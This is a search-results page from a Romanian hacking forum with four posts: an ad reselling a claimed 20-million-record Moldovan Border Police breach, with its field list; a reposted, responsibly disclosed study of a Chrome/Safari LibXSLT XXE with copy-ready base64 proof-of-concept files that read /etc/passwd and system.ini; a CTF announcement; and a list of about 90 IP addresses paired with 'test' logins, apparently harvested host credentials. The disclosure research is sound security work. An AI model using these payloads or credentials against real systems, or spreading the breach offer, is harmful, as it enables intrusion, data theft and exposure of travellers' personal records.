Jump to content

Search the Community

Showing results for 'test'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. https://breachforums.st/Thread-SELLING-Moldova-MD-Moldavia-Border-Police-20-million-2024 User PieWithNothing claims to have breached 20 million records from Moldavian Border Police. Selling for the price of 1900$(still cheaper then an penetration-test) Full database contains 103 fields: id, created_at, post_id, direction, persons, vehicle_country_id, vehicle_mark, vehicle_model, vehicle_vin_code, vehicle_plate_number, category, driver_full_name, person_idnp, transportator_full_name, transportator_personal_code, days_in_rm, days_in_rm_from_last_entry, crossing_time, old_inf, driver_image_id, is_copy, is_anta_confirmed, is_general_data_confirmed, has_scale, ruta_pfa_id, copy_letter_id, has_scan, load_country_id, old_vch_tpe_x, is_overstaying, old_instance_id, legal_code, stopped_at, ruta_pfa_creation_date, post_pfa_cod, has_md_ua, is_ansa_confirmed, inspector_id, control_date, mdua_verification_result, transshipment_id, mdua_declaration_comment, old_etr_dte, old_vch_tpe_spc, is_md_ua_confirmed, stopped_reason, is_seed_sent, sesiz_id, is_push_border_crossing, old_tpe_exe_dsc, act_control_id, has_ansa, status, old_tpe_exe, has_warehouse, is_scale_confirmed, rsf_id, is_accepted_by_sgr, old_tpe_ret, has_goods, legal_name, is_scan_confirmed, accepted_date_sgr, updated_at, old_eco_sum, old_sys_ope, total_amount, is_duplicated, swim_lane_original_color, old_lst_of_sys_ope, unload_country_id, declaration_number_mdua, return_reason, copy_foreign_post, old_procure_dte, is_scan_confirmed_by_operator, has_anta, return_id, transport_border_mode, transport_border_type, @version, is_copied_in_old_app, lane_index, old_procure_nbr, created_by, @timestamp, continued_at, is_paid, customs_regime_id, irregularities, is_from_pf, is_seed_received, withholding_reason, plate_number_confirmed, updated_by, status_date, transaction_id_idx2, old_eco_cat, message_id, old_etr_cuo_cod, old_tpe_doc, is_warehouse_confirmed, old_eco_trm
  2. A year ago, I wondered what a malicious page with disabled JavaScript could do. I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled? Since I was too lazy to read the documentation, I started generating examples using ChatGPT. XSL The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data. In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example. system-properties.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?> <root/> system-properties.xsl <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <p> Version: <xsl:value-of select="system-property('xsl:version')" /> <br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </p> </xsl:template> </xsl:stylesheet> Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome: The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications. The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios. get-location.xml <?xml-stylesheet href="get-location.xsl" type="text/xsl"?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test> <getLocation test="ent"/> </test> get-location.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > <xsl:output method="html"/> <xsl:template match="getLocation"> <input type="text" value="{unparsed-entity-uri(@test)}" /> </xsl:template> </xsl:stylesheet> Here is what you should see after uploading this code to your web server: All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”. XSL and Remote Content Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML. I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it. XML External Entities Since XSL is XML-based, usage of XML External Entities should be the first option. <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> XInclude XInclude is an XML add-on that’s described in a W3C Recommendation from November 15, 2006. <?xml version="1.0"?> <test xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/passwd"/> </test> XSL‘s <xsl:import> and <xsl:include> tags These tags can be used to load files as XSL stylesheets, according to ChatGPT. <?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:include href="file:///etc/passwd"/> <xsl:import href="file:///etc/passwd"/> </xsl:stylesheet> XSL’s document() function XSL’s document() function can be used for loading files as XML documents. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('file:///etc/passwd')"/> </xsl:template> </xsl:stylesheet> XXE Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol. When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android! iOS + Safari Android + Chrome Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions. There was no chance that this wasn’t a vulnerability! Here is a photo of my Smart TV, where the file reading works as well: I compiled a table summarizing all my tests: The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user. Other Tests I have tested some applications that use LibXSLT and don’t have sandboxes. App Result PHP Applications that allow control over XSLTProcessor::importStylesheet data can be affected. XMLSEC The document() function did not allow http(s):// and data: URLs. Oracle The document() function did not allow http(s):// and data: URLs. PostgreSQL The document() function did not allow http(s):// and data: URLs. The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT. According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack. POCs You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later. First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them: The result of opening the xxe_all_tests/test.html page in an outdated Chrome Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights. As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding: Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article. poc.svg <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE svg [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <svg location="ent" /> poc.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test1 location="ent"/> poc.html <html> <head> <title>LibXSLT document() XXE tests</title> </head> <body> SVG<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlsZEdNdmNHRnpjM2RrSlRJeUpUTkZKVEl3SlRWRUpUTkZKVEJCSlRORGVIaGxKVE5GSlRCQkpUSTJlSGhsSlROQ0pUQkJKVE5ESlRKR2VIaGxKVE5GSnlraUx6NEtQQzlrYVhZK0Nqd3ZabTl5WldsbmJrOWlhbVZqZEQ0S1BDOXpkbWMrQ2p3dmVITnNPblJsYlhCc1lYUmxQZ284TDNoemJEcHpkSGxzWlhOb1pXVjBQZz09Ij8+CjwhRE9DVFlQRSBzdmcgWyAgCiAgICA8IUVOVElUWSBlbnQgU1lTVEVNICI/IiBOREFUQSBhYWE+ICAgCl0+CjxzdmcgbG9jYXRpb249ImVudCIgLz4="></iframe><br/> SVG WIN<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlqT2k5M2FXNWtiM2R6TDNONWMzUmxiUzVwYm1rbE1qSWxNMFVsTWpBbE5VUWxNMFVsTUVFbE0wTjRlR1VsTTBVbE1FRWxNalo0ZUdVbE0wSWxNRUVsTTBNbE1rWjRlR1VsTTBVbktTSXZQZ284TDJScGRqNEtQQzltYjNKbGFXZHVUMkpxWldOMFBnbzhMM04yWno0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0MSBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiIC8+"></iframe><br/> XML<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/> XML WIN<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/> </body> ZIP archive for testing: libxslt.zip. The Bounty All findings were immediately reported to the vendors. Safari Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000. 💰 Chrome Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000. 💸 Links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40415 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4357 https://issues.chromium.org/issues/40066577 Feel free to write your thoughts about the article on our X page. Follow @ptswarm so you don’t miss our future research and other publications. Source: https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/
  3. DefCamp Capture the Flag 2024 START DATE END DATE Friday, September 27, 2024 at 10:00 AM UTC Sunday, September 29, 2024 at 9:00 AM UTC EVENT OVERVIEW You have to be authenticated to be able to join this contest. 🚩 Mark Your Calendars! The DefCamp Capture the Flag (D-CTF) Qualification Phase is Locked and Loaded for 2024! 😱 Get ready to dive into the most electrifying and audacious security CTF competition in Central and Eastern Europe—DefCamp Capture The Flag (D-CTF)! This is where the sharpest hackers and IT masterminds come together to push their skills to the limit, battling it out with top CTF teams from around the globe. The mission? Secure a spot in the elite top 10 and ultimately conquer the D-CTF competition—or go down fighting! Since 2011, DefCamp Capture the Flag has been the ultimate battleground for over 10,000 players. This annual, multi-stage event is open to all, but remember one crucial rule—hack or be hacked! Event Highlights Brace yourselves for an adrenaline-packed adventure with around 10 beginner-friendly challenges and 15 more difficult tasks that will test even the most seasoned players. Format: Jeopardy Play Format: Team-only Genres: Crypto, Pwning, Reversing, Web, Forensics, Miscellaneous… Language: English Access: Open / Free for everyone Difficulty: Entry Level - Easy - Medium - Hard - Insane Website: D-CTF The Challenge Awaits Tackle a variety of challenges across multiple categories. Exploit system weaknesses, follow cryptic hints, and uncover hidden secrets. Each challenge holds a unique flag in the format CTF{sha256 random message}. Capture it, submit it on our platform, and rack up your points. CTF competitions are a thrilling mix of puzzles and challenges, including reverse-engineering, memory corruption, cryptography, web tech, and more. Solve them, capture the flag, and climb the leaderboard to victory! Detalii: https://dctf24-quals.cyber-edu.co/?tenant=cyberedu
  4. 23.19.189.64,test,test 23.19.117.165,test,test 23.19.253.205,test,test 23.19.247.186,test,test 23.19.243.66,test,test 23.19.191.87,test,test 23.19.191.47,test,test 23.19.0.142,test,test 23.19.255.91,test,test 23.19.189.78,test,test 23.19.243.5,test,test 23.19.247.34,test,test 23.19.247.73,test,test 23.19.243.101,test,test 23.19.117.94,test,test 23.19.247.120,test,test 23.19.117.248,test,test 23.19.124.79,test,test 23.19.255.93,test,test 23.19.124.178,test,test 23.19.124.47,test,test 23.19.237.102,test,test 23.19.243.65,test,test 23.19.255.121,test,test 23.19.203.13,test,test 23.19.229.38,test,test 23.19.247.122,test,test 23.19.189.12,test,test 23.19.117.142,test,test 23.19.117.245,test,test 23.19.203.14,test,test 23.19.0.161,test,test123 23.19.117.163,test,test 23.19.0.98,test,test123 23.19.117.76,test,test 23.19.117.67,test,test 23.19.0.151,test,test123 23.19.0.172,test,test 23.19.0.110,test,test123 23.19.0.141,test,test123 23.19.0.251,test,test 23.19.0.118,test,test123 23.19.0.85,test,test123 23.19.0.48,test,test123 23.19.255.234,test,test 23.19.124.13,test,test 23.19.124.226,test,test 23.19.117.210,test,test 23.19.117.119,test,test 23.19.124.165,test,test 23.19.0.70,test,test 23.19.255.138,test,test 23.19.0.145,test,test 23.19.117.243,test,test 23.19.0.139,test,test 23.19.189.234,test,test 23.19.189.167,test,test 23.19.0.149,test,test 23.19.0.203,test,test 23.19.117.195,test,test 23.19.0.30,test,test 23.19.237.39,test,test 23.19.247.159,test,test 23.19.0.165,test,test 23.19.0.80,test,test 23.19.0.183,test,test 23.19.0.66,test,test 23.19.124.40,test,test 23.19.0.28,test,test123 23.19.0.218,test,test 23.19.0.204,test,test 23.19.191.146,test,test 23.19.0.126,test,test 23.19.0.72,test,test 23.19.0.12,test,test 23.19.124.112,test,test 23.19.117.15,test,test 23.19.0.89,test,test 23.19.253.92,test,test 23.19.247.24,test,test 23.19.0.158,test,test 23.19.124.243,test,test 23.19.0.86,test,test 23.19.0.59,test,test 23.19.117.175,test,test 23.19.0.104,test,test 23.19.117.179,test,test 23.19.255.44,test,test 23.19.117.183,test,test 23.19.124.236,test,test 